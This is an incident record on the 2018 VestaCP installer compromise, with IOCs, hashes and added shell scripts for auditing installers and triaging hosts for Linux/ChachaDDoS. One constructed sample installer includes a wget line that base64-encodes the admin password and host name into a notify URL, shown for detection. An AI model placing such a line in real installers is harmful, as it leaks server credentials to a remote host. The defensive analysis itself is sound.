Open Source 2018-05-31 · 13 days · Credential Theft, Data Exfiltration, DDoS, Remote Code Execution

VestaCP installer leaked admin passwords

VestaCP's official installer leaked admin passwords and server domains to Vesta infrastructure. Attackers later used that access path to install Linux/ChachaDDoS on customer servers.

Story

VestaCP's official installer carried malicious code for about two weeks in 2018. The change appeared in commit a3f0fa1 on May 31 and was removed in commit ee03eff on June 13. During that window, every new installation made with that script sent the base64-encoded admin password and server domain to Vesta's infrastructure as part of the normal install path.

The leak was quiet because it used Vesta's own infrastructure: the outbound request went to the project's own domain, so it did not stand out from the installer's legitimate traffic. ESET traced the relevant line to vst-install-ubuntu.sh, where the variable $codename held the base64-encoded admin password and host name that the script sent to http://vestacp.com/notify/. A VestaCP team member later said the project's infrastructure server had been hacked, likely through an API bug in release 0.9.8-20, and that the attackers modified the installation scripts to log admin passwords and IP addresses.
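To make the leak mechanism concrete, here is an added example of the kind of audit a practitioner would run on an installer before piping it to a shell. It is not VestaCP's installer code and does not reproduce the line ESET quoted: it lists every curl or wget invocation whose command line expands a shell variable (the pattern by which local data leaves with a request), and base64-decodes the query of a notify-style URL to show what such a request exposes. The installer fragment in SAMPLE_SCRIPT is constructed for this example, and the names vpass and servername are assumptions, not taken from the real script.

```sh
#!/bin/sh
# Added example (not VestaCP's code): audit an installer for outbound requests
# that carry local data, and decode a base64 notify payload. SAMPLE_SCRIPT is
# constructed; vpass and servername are assumed variable names.

# Constructed installer fragment: one harmless download and one line that
# base64-encodes the admin password and host name into a request URL.
SAMPLE_SCRIPT='#!/bin/bash
vpass=$(tr -dc A-Za-z0-9 </dev/urandom | head -c 16)
servername=$(hostname -f)
# harmless: fetches a file, sends nothing that belongs to this host
curl -s -o /tmp/latest.txt https://vestacp.com/latest.txt
# exfiltration: local secrets become part of the request URL
codename=$(printf "%s|%s" "$vpass" "$servername" | base64 -w0)
wget -q -O /dev/null "http://vestacp.com/notify/?$codename"'

# Print (with line numbers) every curl/wget command whose arguments expand a
# shell variable. A plain download that embeds nothing local is not listed, so
# the output is the short list a reviewer must read before running the script.
find_outbound_with_vars() {
    printf '%s\n' "$1" | grep -nwE 'curl|wget' | grep -E '\$[A-Za-z_{]'
}

# Take the query string of a notify-style URL and base64-decode it, i.e. show
# in clear text what the request would have leaked to the receiving server.
decode_notify_payload() {
    printf '%s' "${1#*\?}" | base64 -d
}

# Build the URL the sample script would send for a known password and host,
# then decode it again. The round trip shows that the "encoding" hides nothing
# from anyone who can read the request or the web server's access log.
demo_round_trip() {
    payload=$(printf '%s|%s' "$1" "$2" | base64 | tr -d '\n')
    decode_notify_payload "http://vestacp.com/notify/?$payload"
}
```

Run `find_outbound_with_vars "$(cat vst-install-ubuntu.sh)"` against a downloaded copy of any installer to get the same short list for that script; every hit deserves a look at which variables feed the URL or POST body.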

The impact surfaced months later. Forum users reported VestaCP servers generating abnormal bandwidth and launching outbound attacks. One September report showed an attacker logging in over SSH with the admin password, running creator-x86_64-1 from /var/tmp, and erasing the auth logs. Vesta told users to change their admin passwords and check for /usr/bin/dhcprenew.

ESET analyzed the malware as Linux/ChachaDDoS. It persisted as dhcprenew, hid as [kworker/1:1], downloaded architecture-specific second stages, decrypted them with ChaCha, and ran Lua tasks. Observed tasks performed SYN DDoS attacks. The supply-chain failure was the credential leak; the botnet was the consequence.
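A triage check for the indicators the forum reports and ESET's analysis name (the /usr/bin/dhcprenew persistence file, the /var/tmp/creator-x86_64-1 dropper, and a process that calls itself [kworker/1:1]), added here as an example; it is not ESET's or VestaCP's code. The process listing in SAMPLE_PS is constructed in the format of `ps -eo pid,ppid,comm,args`; on a live host the wrapper at the end runs the same functions against the real system. The kernel-thread rule it applies is general rather than specific to this family: genuine kernel threads are children of kthreadd (PID 2), so a bracketed name with any other parent is a user process in disguise.

```sh
#!/bin/sh
# Added example (not ESET's or VestaCP's code): host triage for the indicators
# named in the write-up. SAMPLE_PS is a constructed listing in the format of
# `ps -eo pid,ppid,comm,args`.

SAMPLE_PS='  PID  PPID COMMAND         COMMAND
    1     0 systemd         /sbin/init
    2     0 kthreadd        [kthreadd]
   15     2 kworker/1:1     [kworker/1:1]
 2231     1 dhcprenew       [kworker/1:1]
 2240  2231 sshd            /usr/sbin/sshd -D'

# Files the incident write-up names as indicators (relative to the root).
IOC_PATHS='usr/bin/dhcprenew var/tmp/creator-x86_64-1'

# Report every process whose argv looks like a kernel thread ([name]) but
# whose parent is neither kthreadd (PID 2) nor the idle task (PID 0). Real
# kernel threads never have a user-space parent, so a bracketed name under
# init, a shell or a daemon is a user process that renamed itself.
find_fake_kernel_threads() {
    printf '%s\n' "$1" | awk '
        NR > 1 && $4 ~ /^\[.*\]$/ && $2 != 2 && $2 != 0 { print $1, $3, $4 }'
}

# List which IOC paths exist below the given root ("/" on a live host).
check_ioc_paths() {
    root=${1:-/}
    for p in $IOC_PATHS; do
        if [ -e "$root/$p" ]; then printf '%s\n' "$root/$p"; fi
    done
}

# Live-host wrapper: the same checks against the running system, plus the
# /proc cross-check that a real kernel thread has no readable exe link.
triage_live_host() {
    find_fake_kernel_threads "$(ps -eo pid,ppid,comm,args)" |
    while read -r pid comm args; do
        exe=$(readlink "/proc/$pid/exe" 2>/dev/null)
        printf 'suspicious pid %s (%s) exe=%s\n' "$pid" "$args" "${exe:-<none>}"
    done
    check_ioc_paths /
}
```

The /proc cross-check matters because an attacker who changed the password and wiped the auth logs, as in the September report, can also rename a file; the parent PID and the exe link come from the kernel and are not under the process's control.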

Affected Artifacts

VestaCP

shell script · vestacp.com · repository · Installer Script
Observed
2018-05-31 to 2018-06-13
Compromised Versions
Unknown
Fixed
Not listed
Hashes
  • sha256:b9f1ffcbaf887c8ec4eb260ae1fdc25b07f4849d194388eee0707f9bf23c1bca
  • md5:35e9334ae8aef10c4a97e7cc90ff964d
Notes
  • CVE-2018-25117 (as described by VulnCheck) gives the affected scope as VestaCP commit a3f0fa1 through commit ee03eff.
  • VestaCP 0.9.8-23, released in October 2018, addressed security flaws found during the later incident response.

Incident Context

Motive
Botnet DDoS
Attribution
Group
Cause
Compromised Infrastructure
Transitive
No
Actor
Cybercriminal Gang

External References

Source record: oss/attacks/vestacp/meta.yaml